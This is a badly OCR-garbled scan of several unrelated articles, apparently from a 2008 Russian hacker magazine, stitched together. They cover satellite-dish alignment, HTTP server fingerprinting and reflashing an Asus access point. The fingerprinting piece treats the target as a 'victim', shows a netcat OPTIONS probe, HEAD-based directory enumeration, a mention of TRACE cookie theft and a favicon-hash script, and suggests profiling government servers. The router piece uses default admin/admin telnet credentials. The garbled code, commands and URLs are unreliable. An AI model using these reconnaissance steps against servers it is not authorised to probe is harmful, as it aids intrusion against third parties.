держателя строго вертикально, чтобы треугольник на конвертере, обозна- 
чающий положение приемногозонда, находился сверху. Подключаем мотор 
согласно инструкции к конвертеру и к приемнику. После чего приступаем 
непосредственно к настройке. 

Юстировку надо начинать с вершинного спутника. На приемнике необ- 
ходимо установить параметры ЕМ В для вершинного спутника, а также 
ввести координаты места приема вустановках П5АЕ5 (если приемники 
мотор поддерживают этот режим], выбрать вершинный спутник из общего 
списка и установить параметры рабочего транспондера (передающая часть 
спутника]. Параметры рабочихтранспондеров для любогоспутника можно 
найти на сайте ѵѵѵѵѵѵ.ІѵпдзаЕсопп . Некоторые приемники подают команду на 



мотор для поворота сразу после выбора спутника; мотор при этом должен 
переместиться в нужную позицию. Если этого не произошло, то вручную 
подай команду «Идти в позицию». В этом положении мотора будем настраи- 
ваться на вершинный спутник. 

Если приемник не поддерживает режим Н5АЕ5, то повернуть мотор 
на необходимый угол придется самому, ручками, используя пошаго- 
вый режим. Чтобы это сделать точно, нужно сначала определить угол, 
эквивалентный одному шагу. Считая шаги, поверни хобот мотора на 1 0° 
и контролируй угол поворота по шкале мотора. Сделал? Теперь остается 
разделить 10 градусов на количество шагов и получить искомый угол! 

Угол поворота хобота мотора, которому соответствует направление на 
нужный спутник, рассчитываем поспециальней формуле «угол поворота 
полярной подвески». В моем случае вершинный спутник Еига5Іа5а1;42Е с 
орбитальной позицией 42 градуса, и этотугол равен 2.38°. Отрицательное 
значениеугла означало бы, что поворачивать мотор нужно в западном 
направлении. 

Проверяем, вселитак, как надо: антенна установлена на вертикальную 
опору, повернута ориентировочно в южном направлении, приемник 
включен в режим контроля сигнала и качества, установлены парамет- 
ры заведомо рабочего транспондера, хобот мотора повернут на угол, 
соответствующий вершинному спутнику. Теперь плавно, без рывков, 
поворачиваем антенну в одну сторону, потом в другую — пока шкалыуров- 
ня сигнала и качества не покажутзначение, отличающееся от нулевого 
значения (см. «Спутниковые радости»]. Добиваемся максимального зна- 
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чения показаний шкал и равномернозатягиваем гайки хомутов подвески. 
Затягивая гайки, помни, что при этом антенна слегка поворачивается 
вслед за обжимаемым хомутом, поэтому необходимо следить за значени- 
ем шкал сигнала и качества. Легким отклонением антенны вверх и вниз 
проверяем, одинаково ли при этом уменьшаются уровни шкал. Если пока- 
зания шкал увеличиваются при перемещении в каком-либо направлении, 
то необходимо ослабить крепления угла элевации и подстроить положе- 
ние антенны по максимуму уровня шкал. В этом положении затягиваем 
креплениеугла элевации. Антенну следует отклонять нежно и аккуратно, 
насколько позволяетестественная упругая деформация подвески. Ни в 
коем случае недопускай деформациизеркала, иначе получишьложный 
эффект изменения уровня. 

Если все сделано правильно, то можно с 90%уверенностью сказать, 
что настройка завершена. Нужнотолько проконтролировать сигнал на 
крайних спутниках. Поворачиваем антенну сначала на восточный спутник 
и контролируемуровеньсигнала при отклонении антенны вверх и вниз. 
Потом — на западный и также контролируемуровеньсигнала при откло- 
нении антенны. Если на крайних спутниках при отклонении антенны вверх 
и вниз сигнал уменьшается одинаково, то настройка удалась на славу. 

Ну, а если не повезло и сигнал увеличивается при отклонении антенны, 
то отчаиваться тоже не стоит. Нужно лишьзапомнить, при отклонении в 
какую сторону увеличивается сигнал на западном и восточном спутниках. 
По приведенной таблице находимтвою ситуацию и исправляем. После 
каждой поправки положения подвески проверяй прием на вершинном и 
крайнихспутниках. При необходимости — примени дополнительные кор- 
ректировки. Для тонкой настройки подвески бывает достаточно подтянуть 
нужную гайку: антенна отклонится на очень маленький угол — и его порой 
хватает, чтобы исправить неточности настройки. 

Кстати, совет новичкам, первый раз взявшимся за настройкуантенны. Будет 
лучше, если ты потренируешься в настройке антенны с азимутально-угло- 
местной подвеской на разные спутники перед тем, как браться за настройку 
мотоподвеса. Это даст возможность освоить установку параметров прием- 
ника и «пристреляться» кспутникам. Да и чувствовать себя будешь намного 
уверенней ! ~и~ 



Как посчитать 
офсетность 
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СПЕЕМ РОѴѴЕК 



Исходными данными нужно взять большой (В) и малый (б) диамет- 
ры антенны. Эти значения не стоит брать из паспорта. Их следует 
измерить с максимально возможной точностью по кромкам в местах 
перехода параболической части зеркала на бортики. Формула расче- 
та угла офсетности предельно простая: офсетность = АС05 (б/В) 
Заметь, что не все офсетные антенны поддаются такому расчету. 
Некоторые производители антенн преднамеренно изменяют фор- 
му зеркала, и оно получается не эллиптической формы, а круглой. 

В таких случаях, чтобы определить угол офсетности, приходится 
идти на ухищрения. Один из вариантов — надежно установив зер- 
кало антенны в горизонтальном положении, налить в него воду и 
измерить размер получившейся эллиптической лужицы по макси- 
мальному и минимальному значению. Эти значения — подставить 
в вышеуказанную формулу. 
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АНДРЕЙ КОМАРОВ’ 



ОТПЕЧАТКИ 



НТТР 



Не надо бы ть телепатом, чтобы узнать, какой софт установлен на удаленной 
^^ашине. Уверенное знание матчасти и несколько хитр ых приемов позволя- 



т многое выяснить о своей жертве. Сегодня мы займемся НТТР-протоко 



ІВЫЯСНЯЕмГІ^КОЙ ВЕБ-СЕРВЕР РАБОТАЕТ НАУДАЛЕННОИ МАШИНЕ 



ЛОМ и его особенностями, которые позволяют удаленно определить, какой 
демон работает на сервере. 



НТТР (англ. НурегТехІ: Тгапзі'ег РгоЬсоУ — протокол передачи гипер- 
текста. С его помощьютвой браузер общается с веб-серверами. В 
основе НТТР лежит технология «клиент-сервер»: клиенты инициируют 
соединение и посылаютзапрос, а ожидающие соединения серверы 
производят необходимые действия и возвращают обратно сообщение с 
результатом. Общение происходит по простой и понятной схеме «запрос- 
ответ». Однако реакция различных НТТР-демонов на различные запросы 
зачастую неодинакова, так как разработчик сам проектирует поведение 
своей программы и отнюдь не всегда придерживается общего стандар- 
та. Поэтому существует большое количество приемов для определения 
ѴѴЕВ-сервера и его конкретной версии. Все эти методы, объединившись 
воедино, носятназвание НТТР-ргіпІіпд (аналогия «бпдегргіпбпд»). 
Большинство из них основано на внимательном анализе ответов сервера 
на различные запросы. Нопреждечем перейти ких изучению, необходи- 
мо разобраться с самим протоколом НТТР. 

Н НТТР ИЗНУТРИ 

Какуже было сказано, общение между клиентом НТТР и сервером происхо- 
дит посредством отправки запросов и получения ответов. Каждый НТТР-за- 
прос состоит из четырех частей, которые передаются в указанном порядке: 

• Строка запроса (кедиезС Ііпе). 

• Заголовки (неайегз) — характеризуюттело сообщения, параметры пере- 
дачи и прочие сведения. 

• Пустая строка. 

• Тело сообщения (меззаде Войу) — непосредственно данные сообщения. 
Заголовки и тело сообщения могут отсутствовать, но стартовая строка явля- 
ется обязательным элементом, так какуказывает на тип запроса/ответа. 



В строке запроса обязательноуказывается один из методов (МеіЬоб), кото- 
рый отображает суть за проса. С ними нужно разобраться особенно четко, 
чтобы не осталось ничего неясного. В описании протокола НТТР (РРС 2616) 
заявлены следующие методы: 

• ЗапросОЕТ. Наиболее популярный и знакомый всем метод. Имен- 
но 6ЕТ применяется при открытии любого ресурса или скачивании 
файла. Метод используется для запроса конкретного объекта на 
конкретном ресурсе. Различают сопйісіопаі СЕТ (зависитот 
выполнения определенных условий] и рагсісіопаі СЕТ (если 
часть информации уже имеется и закэширована и требуется дока- 
чать недостающее). 

• ЗапросОРТІОМЗ. Метод служит для опроса сервера о его возможнос- 
тях. Позволяет клиенту определитьопции и/или требования, связан- 
ные с ресурсом, а также информацию о возможных способах общения 
клиента и сервера. Как правило, доступные методы на сервере можно 
получить путем анализа поля АІІо^я. Ниже — пример с ЫеСсаС: 

ПС ѵісЪіт. сот 80 
ОРТІОЕЗ / НТТР/1 . 1 
НозС : ѵісЪіт. сот 

НТТР/1 . 1 200 ОК 
Зегѵег: МісгозоІЦ-ІІЗ/5 . 0 
Вале: Тие, 1 Зер 2008 08:00:29 СМТ 
СоппесДіоп: сіозе 

АІІоѵ^: СЕТ, НЕАВ, РОЗТ, ТКАСЕ, ОРТІОЫЗ 
СопДепЦ-ЕепдЩі: 0 
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ХАКЕР 09 /117/ 08 










Результат работы замечательной утилиты НТТРгіпІ: 






1ІВІ-- ' 









Это очень удобно, так как изба вляеттебя от проверки всех возможных 
вариаций и получения кодов ответа после их выполнения. О доступных 
методах важно знать, потому что некоторые из них небезопасны. К примеру, 
с методами ТРАСК/ТРАСЕ есть возможность произвести хищение куков с 
использованием известного приема Сгозз-ЭіІеТгасіпд. Впрочем, это уже 
разговор для отдельной статьи. 

• ЗапросНЕАО. Переднами клон 6ЕТ стойлишьразницей, чтосервер 
будет возвращать только специальную служебную информацию, связан- 
ную с запрошенным документом, а тело сообщения будет отсутствовать. В 
хакерских целях метод используется для проверки наличия директорий на 
удаленном сервере. Для этого требуется подготовитьсписокдиректорий и 
закидывать сервер по следующему алгоритму: посылаем НЕАВсуказанием 
пути искомой директории, ждем выполнения запроса, проверяем статус 
ответа — если он равен 200 (ОК) и мета-данные присутствуют, то директория 
с большой долей вероятности существует на сервере. 

• Запрос Р05Т. Этот метод используется в случаях отправки сообщений 
и передачи данных. Тело запроса передается серверу, и тот интерпре- 
тируетего в зависимости от ІЭВІ запроса. ІЭВІ — это стандарт фор мата, 
используемого для определения извлекаемого ресурса. В подмножество 
иВІвходитЭВЕ/иВМ. 

• Запрос РІЯ. Метод РІЯ используется для создания нового объекта с 
заданным в за просе и ВІ. Если ресурс с таким ВВІуже существует, то тело 
запроса рассматривается какего обновленная версия. Один из примеров 
использования — простая выгрузка файла на сервер (создание нового 
файла, замена существующего). 

• Запрос ОЕЕЕТЕ. Метод ВЕЕЕТЕ используется для удаления ресурса 
под заданный ОВІ. В этой ситуации сервер часто просит подтверждения 
действия. 

• ЗапросТРАСЕ. Метод ТРАСЕ используется в целях отладки и диагности- 
ки. С его помощью можно удостовериться, были ли данныедействительно 
приняты адресатом запроса. 

• Запрос СОММЕСТ. Имя этого метода зарезервировано для прокси-серве- 
ров, которые могут динамически становиться туннелями (кпримеру, 55Е). 

г ТЕХНИКА НТТР-РтМТІЫб 

Приемов для определения ѴѴЕВ-сервера и его конкретной версии довольно 
много. Из основных можно выделить: 

• «прямой» просмотр поля «Эегѵег», получаемого из Везропзе-ответа 
после отправки запроса ОЕТ ; 

• изучениетогоже поля после серии запросов других методов, втом числе 
и ошибочных; 

• анализ кодов ошибок, высылаемых в качестве статуса выполнения 
метода; 

• сравнение шаблона Таѵісоп.ісо для конкретного сервера с удален- 
ным; структура высылаемого Еезропзе-ответа. 

Подробнее рассмотрим некоторые из них. 

Анализ поля «Эегѵег» в ответе сервера (пример ответа можно увидеть 
выше) — это самый простой вариант, однако администратору ничего не 



Ситуации бывают самые разные. Администратор может установить! 
связку, аналогичную пдіпх, и реальный ѴѴЕВ-сервер (Арасбе). В этом 
плане определить реальное ПО бывает крайне трудно, особенно если 
администратор совместно с ѵѵеЬ-мастерами продумал способ выдачи 
ошибокпосетителям и запретил небезопасные методы. При НТТР- 
:фаззинге ВатЫег.ги из полей Эегѵег можно выделить сразу несколько 
пдіпх, причем разных версий (0.6.31 , 0.6.32, 0.7.12). Это говоритотом, что 
нагрузка на сервера принимается по распределенной схеме 



стоитзаменить информацию в этом поле. Но если верить стандарту, то 
в этом поле содержится информация об используемом программном 
обеспечении втом виде, в котором это указывает сам ѴѴЕВ-сервер. На- 
пример, известный НТТР-демон Арасбе имеет несколько видов отдачи 
информации о себе: Ргоб (Арасбе), Міп (Арасбе/1 .3.0), Ма)ог (Арасбе/1 ), 
Міпог (Арасбе/1 .3), ОЭ (Арасбе/1 .3.0 (ПМІХ)), ЕиЕ (Арасбе/1 .3.0 (ПМІХ) 
тосІ_1'а5І;сді/2.4.2 тос1_рег[/2.0.2 Рег[/ѵ5.8.7). Стоитзаметить, что в 
конфигурационных файлах можно отключить отображение назва- 
ния и версии демона. До версии 2.0.44 та кая директива называлась 
ЭегѵегЭідпаШге и находилась в ЬЦЦрй. соп^. В старших версиях 
этой ветки директива носит название ЭегѵегТокепз. В статье «Сетевой 
камуфляж» приводились примеры и способы скрытия демонов, втом 
числе распространяющиеся на ѴѴЕ В -серверы. 

Коды ошибок (они же — статусы выполнения) — еще один способ 
узнать некоторые данные о сервере. Метод, который считается 
очень точным, может служить в качестве дополнительного эврис- 
тического теста. Нарушить детектирование можно с помощью ре- 
дактирования исходных кодов или конфигов. ѴѴЕВ-сервер Арасбе 
имеет для этого следующие директивы: ьітісКериезСВосіу, 
ЬітіСКериезСРіеІсіз, ЬітіСКериезСРіеІсіЗіге, 
ьітіскедиезсьіпе. Хотя, конечно, их прямое назначение за- 
ключается совсем в другом: они нужны для снижения вероятности 
В В оЭ- атак на сервер с помощью аномальных запросов. 

Иконка сервера — деталь, казалось бы, незаметная. Но и она способна 
выдать тот или иной демон. При первоначальной установке многиеѴѴЕВ- 
сервисы по умолчанию устанавливаюттестовый сайт, где отображается 
автоматическое приветствие и Раѵісоп. Почему бы это не проана- 
лизировать? Предварительно можно написать небольшой скрипт для 
получения хэш-суммы Раѵісоп. Натравитьего на иконку из локального 
пакета и затем сравниватьсхеш-суммами иконоксудаленныхсерверов, 
где администраторы из-за рассеянности забыли удалить тестовую иконку и 
страницы документации. Вот пример подобного скрипта на РуШоп: 

ітрогД тсі5 
т = тсі5 . пе\ѵ ( ) 

:Е = :Еі1е ( ' :Еі1е . ісо ' , ' г ' ) 
ѵ\[]ті1е Тгие : 

Ц = г.геаса(1024) 

1еп(Ц) == 0: Ьгеак 
т.ирйаДе (С) 
ргіпР т.ІіехсіідезЦ ( ) 
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Где искать веб-сервер 

Перед началом анализа ѴѴЕВ-сервера неплохо вьшснить, на каком порту он 
установлен. Ведь работать он может не только на стандартном 80 порту. Если 
картина с самого начала не ясна, лучше просканировать порты удаленного 
сервера. Варианты следующие: 



}ЩЦр 


80/Сср 




ІіССр-тдтЦ 


280/Цср 




]трЦр-зз1 


443 /Сер 




дзз-ІіРРр 


488/Цср 




ІЩЦр-аІС 


591 /Сер 


# РіІеМакег, Іпс . — НТТР АІРегпаке 


ІЩЦр-грс 


593 /Сер 


# НТТР НРС Ер Мар 


ЫРЗ-ог-ІІЗ 


1025/Сср 


# ИЗ, МЕЗ 


ИЗ 


1027 /Сер 




сотрадсііад 


2301/Цср 


# Сотрад гетоке сііадпозкіс 


здиісі-ІіЦрр 


3128/Сср 


# Здиісі НТТР Ргоху ог М3 ІЗА 


ргоху-ріиз 


480 /Сер 


# Ргоху+ НТТР ргоху рогк 


ѵпс-ІЩЦр 


5800/1: ср 


# ѴМС НТТР Ассезз, сіізріау 0 


ѵпс-ІЩЦр-І 


5801/Сср 


# ѴМС НТТР Ассезз, сіізріау 1 


ѵпс-]тРРр-2 


5802 /Сер 


# ѴМС НТТР Ассезз, сіізріау 2 


ѵпс-]тРРр-3 


5803 /Сер 


# ѴМС НТТР Ассезз, сіізріау 3 


апаіодх 


6588/Цср 


# АпаІодХ НТТР ргоху рогк 


ѵ/еЫодіс 


7001/Цср 


# ШеЫодіс 


ѵ/еЫодіс-ззІ 


7002/Рср 


# ШеЫодіс ЗЗН 


ІЩЦр-аІС 


8000/Цср 




]трЦр-аІЦ 


8001/Сср 




]трЦр-аІЦ 


8002 (+9090) /Сер 


ІірЦр-ргоху 


8080/Сср 


# Соттоп НТТР ргоху 


зип-аЬоок 


8888/Сср 


# Зип Апзѵ^егЬоок НТТР зегѵег 



Практика показывает, что таким образом можно отличить про- 
дукты одной семьи, но разных версий (или предназначенные 
для разных платформ): 

22бГГс5е483Ь85ес2б1б54Ге255еб0Ье — ЫеДзсаре 4 . 1 
41е2с893098ЬЗесі9Гс14Ь821а2е14е73 — ЫеДзсаре б. О 

31аа07Ге23бее504с890аб1(31Г7Г0а97 — Арасііе 
2.2.4 

(і41с38сс398Г00Ь204е9800998есГ84275 — Арасііе НТТР 
Зегѵег (Мае ОЗ X Зегѵег) 




Работа плагина для Могіііа — Та треп Раіа. Мы изучили ) 
долгожданный Резропзе от сервера ФБР, так и не получен-] 
цый при помощи НТТРгіпІ 

В ЮЗАЕМ СПЕЦИАЛЬНЫЙ СОФТ 

Ксожалению, на сегодняшний день средства для НТТР- 
ргіпбпд’а не столь разнообразны. Из инструментов наиболее 
известны НТТРгіпІ ( пеІ-здиаге.сот/ЫіргіпІ:/) и НМАР [и]епі. 
тигкѵгос.сот/Ьппар/ ). Создатели первого заявляют, что их 
проект способен распознавать сервера даже с измененной 
версией. Здесь используется целый ряд эвристических 
тестов, некоторые из которых были описаны в этой статье. 
Апакет НМАР натекущий моментявляется плагином киз- 
вестному сканеру безопасности МЕ55СІ5, бесплатный форк 
которого называется ОрепѴАБ (Ореп ѴиІпегаЬШіуЗузІет). 
Создатели обоих инструментов сильно заморачивались, 
чтобы добиться как можно более четкого и правдоподоб- 
ного определения удаленного веб-сервера. Но далеко 
не всегда подобный софт сможет помочь при анализе 
наиболее интересных и защищенных ресурсов. Тогда 
придется действовать вручную, используя вспомогатель- 
ные инструменты типа Татрег Оаіа [ іаппрегсіаіа.ппогсіеѵ. 
огд ). Раіргоху ( сосіе.доодіе.сопп/р/гаіргохѵ ). 

Иногда серьезную помощь могутоказать всевозможные 
веб-сервесы. К примеру, сервис МеіСгаІІ: ведет статистику 
об используемых продуктах на различных хостах во всем 
мире. Естественно, это нам на руку. Допустим, сервер ЦРУ 
[ сіа.доѵ ] режет все аномальные запросы к нему и не выдает 
ни одного баннера сервиса. Как быть? Вбиваем адрес 
амеров в вышеназванную ссылку и получаем следующие 
данные за один из годов: Зоіагіз 8, МеІзсаре-ЕпІегргізеМ.І . 
Словом, способы могут быть самые разные! пг 



> ѵѵагпіпд 

Будь осторожен с эк- 
спериментами: адми- 
нистратору узла твои 
исследования могут 
не понравиться. 



В базе данных МеЮгаІ'І: есть информация даже о самых защищенных сервера]^ 
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Упомянутые програм- 
мы и стандарты ВЕС 
выложены на нашем 
диске. 
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Хакер 

САМЫЕ СОВРЕМЕННЫЕ СПОСОБЫ ЗАЩИТЫ 



Ты когда-нибудь задумывался, что сетевое оборудование представляет собой изнутри? Боль- 
шинство управляемых девайсов, по сути, являются небольшими компьютерами. Со своим процес- 
сором, материнской платой, оперативной и срлеш-памятью... - только вместо привычного корпуса 
они ютятся в симпатичных коробочках с мигающими диодами. Умельцы даже предлагают интерес- 
ные хаки, с помощью которых можно установить, например, дополнительную память. Но сегодня 
мы не будем изощряться с паяльником. Раз уж внутри они - это самый обычный компьютер, стало 
быть, и операционная система найдется (в большинстве случаев, Ыпих). А значит, нам ничего не 
мешает получить доступ к командной строке и немного повеселиться. Для эксперимента возьмем 
один из самых дэункциональных девайсов - точку доступа А$и$ ѴѴІ-500ѴѴ. За счет своих особен- 
ностей он предоставляет практически неограниченное поле для маневров. Как тебе идея научить 
девайс выполнять то, о чем производители даже не думали? Сделать из него веб-сервер для 
отладки РНР-скриптов? Или круглосуточно рипать музыку с интернет-радиостанций? Вот этим мы 
сегодня и займемся! 



, Железо | 


1 ВСЕ САМОЕ ИНТЕРЕСНОЕ ИЗ МИРА КОМПЬЮТЕРНОГО ЖЕЛЕЗА ] 




, Новинки 1 


1 ОБО ВСЕМ НОВОМ И УНИКАЛЬНОМ, ЧТО ЖДЕТ НАС В БУДУЩЕМ ] 


, Бизнес 1 


1 ПОСЛЕДНИЕ ТЕХНОЛОГИИ И ТРЕНДЫ УСПЕШНОГО БИЗНЕСА ] 




, Развлечения | 


1 ВСЕ, ЧТО НУЖНО ДЛЯ СОВРЕМЕННОГО ОТДЫХА ] 



* - журналы-участники проекта: «Страна Игр», «МАХІ Іипіпд», «Свой Бизнес», «Железо», «Хакер», «Мобильные Компьютеры» 





САМЫЕ СОВРЕМЕННЫЕ 

#тОІт^и СПОСОБЫ защиты 

ЖЕЛЕЗО I НОВИНКИ | РАЗВЛЕЧЕНИЯ | БИЗНЕС | БЕЗОПДСНОСІЬ 




л$и$ ІП.-5001Ѵ 



Прокачиваем точку доступа от А$и$ 



Ты вероятно помнишь, что прокачкой АР мы уже зани- 
мались и описывали свой опыт в статье «ЕеѵеІ-ир для 
точки доступа» в 106 номере ][. В качестве жертвы эк- 
сперимента тогда мы взяли замечательную модель ѴѴЕ- 
500дР - с тех пор у автора материала она по-прежнему 



работает 24 часа в сутки и качает (оггепі-файлы. У 
модели, с которой мы будем экспериментировать сегод- 
ня, есть одно весомое преимущество перед «младшей 
сестренкой». Это - поддержка стандарта 802.11л ОгаП! 



Автор: Степан Ильин 



Теоретически, стандарт позволяет достичь скорости передачи 
данных «по воздуху» до 300 М6ит/с. В реальных условиях 
получается в три, а то и в четыре раза меньше - но даже при 
таком раскладе получается скорость обычной 100-мегабит- 
ной сети. Впечатляет? Во всем остальном модели схожи: 4 
порта ЬАМ, 1 ѴѴАМ, два 115В 2.0 порта для подключения прин- 
тера, веб-камеры и жестких дисков. Приступим к операции. 




Первое, что придется сделать, - отказаться от стандартной про- 
шивки. Да, она отлично дэункционирует и гарантирует безуко- 
ризненную работу всех заявленных опций, но для эксперимен- 
тов нам просто жизненно необходима альтернативная Лгтѵѵаге 
от отечественного разработчика ОІед'а, которой пользуются 
продвинутые пользователи по всему миру. 

Залить новую прошивку можно двумя путями: через веб-интер- 
срейс или через утилиту восстановления от А51І5. По большому 
счету, разницы никакой, поэтому, взяв инструкцию, я вос- 
пользовался первым вариантом. Последняя версия Лгтѵѵаге 
всегда доступна на сайте И1:І:р://оІед.ѵѵІ500д.іпі'о (на момент 
публикации - ѴѴ1500ѴѴ-1.9.2.7-10). Перед установкой прошивки 
рекомендуется отсоединить патчкорд от ѴѴАМ-порта (актив- 
ность внешней сети не должна влиять на процесс) и кабели 
от изв-портов. Далее нужно перезагрузить АР через веб-ин- 
тердэейс и перейти на страницу администрирования: «Зузіепп 
Зеіир Пгтѵѵаге ІІрдгабе», где остается только выбрать дэайл 
с прошивкой. 

Надо сказать, что «убить» точку от А51І5 довольно сложно. Даже 
если в момент перешивки выключилось питание или перешив- 
ка не удалась, ее можно восстановить с помошью стандартной 
программы гезсиег.ехе. После установки будет неплохо нажать 
на кнопку РЕ5ЕТ, чтобы сбросить все настройки и устано- 
вить им десролтные значения (на случай, если оригинальная 
прошивка окажется слишком старой). Но учти важный момент: 
минуту-другую перед нажатием РЕ5ЕТ нужно выждать обяза- 
тельно - это время требуется для загрузки роутера. 

Доступ к командной строке 

Для наших экспериментов будет недостаточно не только 
стандартной прошики, но и веб-интерсрейса. Поэтому нужно 
срочно найти способ обратиться к командной строке. К счастью, 
достучаться до нее проше простого: достаточно набрать команду: 
Іеіпеі: 192.168.1.1 (ІР-адрес, конечно, может быть другой). В кон- 
сольном окне тут же появится приглашение для входа в систему, 
и после ввода стандартного логина/пароля (абтіп/асіппіп) ты ока- 



жешься в знакомой никсовой консоли. Развеять сомнения, Ыпих 
это или нет, можно, набрав команду ипате - а. Ты получишь 
примерно следуюший ответ: 

Ьіпих (попе) 2.4.20 #75 Ргі Арг б 00:12:23 МЗВ 2007 тірз 
ипкпоѵ7П 

Работать через Іеіпеі: крайне небезопасно, и в системе лучше 
сразу настроить 55Н-демон - бгорЬеаг. О настройке 55Н, 
подключении жестких дисков, настройке менеджера пакетов 
іркд, с помошью которого легко устанавливается множество 
программ (в том числе, настроенный нами 1:оггеп1-клиент), мы 
уже подробно говорили в вышеупомянутой статье. Поэтому не 
поленись поднять архив (РОГ-версию ты найдешь на диске). А 
теперь - трюки! 

Трюк №1: рипаем радиостанции 

В интернете сейчас вешают множество радиостанций с редкими и 
интересными композициями, которые зачастую хочется записать 
и себе. Но это не магнитодэон, где можно нажать на кнопку «За- 
пись», - а данные в «цисрре», которые нужно рипать. Отличным 
применением для твоего роутера будет как раз возможность 
записи МРЗ-потока. Для этого понадобится установить про- 
грамму зігеаппгіррег и некоторые дополнительные музыкальные 
библиотеки: 

іркд іпзіаіі зкгеатгіррег ІіЬодд ІіЬѵогЬіз ІіЬтасі 

Выбираем директорию на подключенном жестком диске или 
дэлешке (скажем, /орІ/ЛІез/зІгеагпгіррег) и начинаем запись, ука- 
зав в качестве параметров запуска программы ІР-адрес потока, 
откуда ведется вешание: 

зРгеатгіррег кРРр: //зоте.гасЗіо. ір -сЗ /орр/іііез/ 
зРгеатгіррег 

Вот и весь трюк. Зігеаппгіррег будет рипать музыку, сор- 
тируя записи по созданным автоматически директориям 
(с названием радиостанции). Рекомендую взглянуть и на 
другие параметры программы, можно сохранять поток в 
один большой срайл, выбрать срормат для записи (Одд, 

МРЗ или ААС) и т.д. И еше: если не знаешь, где взять адре- 
са интернет-радиостанций, загляни на ѵѵѵѵѵѵ.5Иои1:са5І:.сопп. 
Там их тысячи. 






► 042 



ХАКЕР 09 / 117 / 08 






в этом месяце 

в других журналах клуба! 



ЖУРНАЛЫ-УЧАСТНИКИ: 



Бизнес I «Свой Бизнес» 

«Мобильный Офис». Ваше место работьщначения не имеет 

Развлечения | «Страна Игр» 

«Большие и мошные». Выбор настояшего геймера 

Железо | «Железо» 

«Мать-героиня». Тестируем материнскую л лату А51І5 5ТРІКЕР I 



СТРАНА ИГР I МАХІ ТИИІИС | СВОЙ БИЗНЕС 
ЖЕЛЕЗО I ХАКЕР | МОБИЛЬНЫЕ КОМПЬЮТЕРЫ 
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Так выглядит наша подопытная точка доступа Азиз ѴѴЬ-500ѴѴ 



Трюк 2: ластраиваэд ѴеЬ-сервер с под- 
держкой скриптов Р№ 

Точка достула - отличное место для отладки и даже хостинга 
несложных веб-проектов. Хорошей идеей в этом случае будет ус- 
тановка пакета рЬр-ШІІрб, включаюшего сам веб-сервер, а также 
интерпретатор РНР. Установка сводится к одной лишь команде 
управления пакетами: 

/ор^/Ьіп/іркд іпзРаІІ ркр-'ЫіІіРрсі 

После некоторой активности на экране ты получишь полностью 
рабочий веб-сервер. Настроим его. Сначала нужно указать место, 
где будут храниться сами странички и РНР-сценарии. Это может 
быть, например, /орі/зітаге/ѵѵѵѵѵѵ: 

тксііг /ор^/зкаге/ 
тксііг /ор^/зкаге/'№лм 

С помошью команды /орІ/Ьіп/папо /орІ/еІсЛЬІІрб.сопі' создадим 
конфигурационный файл и вставим в него следуюшее содержа- 
ние: 

б і г = / орк / зкаге /'(лплпл? 

рогк=81 

изег=поЬобу 

поскгоок 

позутііпк 

поѵкозк 

1одкі1е=/орк/ѵаг/1од/ккккрсі. Іод 
рі(ікі1е=/орк/ѵаг/гип/ккккр(і.рісі 

Сохранив изменения с помошью горячей клавиши <с1:гІ> -г О и 
выйдя из редактора при помоши <с1:гІ> -г X, создаем дополнитель- 
ные директории для логов и флагов: 

гпкбіг /орк/ѵа 



гпкбіг /орк/ѵаг/іод 
гпкбіг /орк/ѵаг/гип 

Сохрани изменения и перезагрузись. Теперь можно переместить в 
папку /орі/зітаге/ѵѵѵѵѵѵ пробный НТМ-файл и посмотреть, как веб- 
сервер (в случае нашего конфига - на 81 порту) будет работать. 

Трюк 3: наблюдаем за нагрузкой 

Всегда удобно знать о состоянии своего интернет-канала: чем 
именно он используется, и кто тратит ресурсы больше всех. Если 
установить специальную программу ггб, то обшую картину можно 
получить в виде красивых графиков загрузки интерфейсов. Веб- 
сервер для этого мы уже подготовили, а вот планировшик сгоп 
придется наладить дополнительно, используя подробнейшую 
инструкцию с сайта ѵѵѵѵѵѵ.ппасзаСсопп/сгоп.рІір . Сам ггб устанав- 
ливается командой іркд іп5І:аІІ ггб1:оо1, однако просто взять и за- 
пустить его не получится. В смысле, запустить-то можно, но толку 
будет ноль. Чтобы получить результат в виде приятных графиков 
загрузки, придется использовать специальный скрипт (ггбіооі.зіт) 
с нашего диска, скопировав его в папку /орІ/изг/Ьіп. 

Теперь, чтобы ггбіооі стал собирать информацию и создавать 
графики, необходимо в папке /ор1:/е1:с/сгоп.5ппіп5/ создать для 
планировшика простенький скрипт ггбгип.зЬ и не забыть сделать 
его исполняемым (сЬтоб -гх ггбгип.зЬ): 

# ! /Ьіп/зк 

/орк/изг/Ьіп/ггбкооІ . зк » /орк/ѵаг/1од/ггсікоо1 . Іод 
2>&1 

Отныне каждые пять минут станет собираться информация о 
трафике со всех ѴѴАМ-, ЕАМ- и ѴѴЕАМ-интерфейсов, а каждые 
30 минут будут создаваться графики. Их можно просмотреть, 
обратившись к роутеру по адресу: Іі1:ір.//ІР-адрес-роѵте- 
ра:81/ггб . 

Вот так. Мы же говорили, что это самый настояший компьютер! 
Дерзай, ведь все ограничивается лишь твоей собственной фан- 
тазией. 
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Польз оват ели ІСО, как мыши: плачут, колются, но продолжают есть кактус. 
И в едь п равда: сервера постоянно отваливаются, альтернативные клиенты 
іст^дают из-за изменений в протоколе, а функциональность так и остается 
^а нуле. Пора, наконец, отказаться от старой, хоть и привычной системы и 
найти что-нибудь по душе! 



тем, что проблем у ІСО много, спорить никто не будет. Не надо 
и напоминать, какв очередной раз альтернативные клиенты 
отказались работать из-за неожиданных изменений в прото- 
коле. Разработчикам т^ же приходилось клепать заплатки, 
а пользователям ничего оставалось, кроме какобновляться. И ради чего? 
Разработчики из АОІтак и будут менять закрытый протокол скольугодно 
долго, а приложения так и придется обновлять. Еще хуже — сервера аськи 
вдруг стали «провисать», начиная от небольших перебоев и заканчивая 



суровым дауном на несколько часов. Каждый из нас сталкивался стем, 
что сообщения пропадали непонятно куда, особенно если отправляешь 
их пользователям «в оффлайн». Не говоря уже о передаче файлов между 
двумя разными клиентами, которые, подчас, кроме как высшим пилотажем 
не назовешь. Голосового общения нет, логи раскиданы где попало... — стоит 
ли продолжать? Короче, достоинство у ІСОтолько одно — громадная армия 
пользователей, среди которых и все твои друзья. Но есть ли альтернатива? 
Альтернатива, по большому счету, только одна — система ^аЬЬег, которая 
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Добавляем новый контакУ 



Рбзорсервисов: этот шлюз поддержи ваеттранспорт на ІСО и М5М| 

использует открытый (что очень важно) протокол ХМРР. Ксожалению, 
пока этой технологией пользуются исключительно продвинутые пользо- 
ватели и гики. Но компания боодіе обещает сделать ее массовой, выпус- 
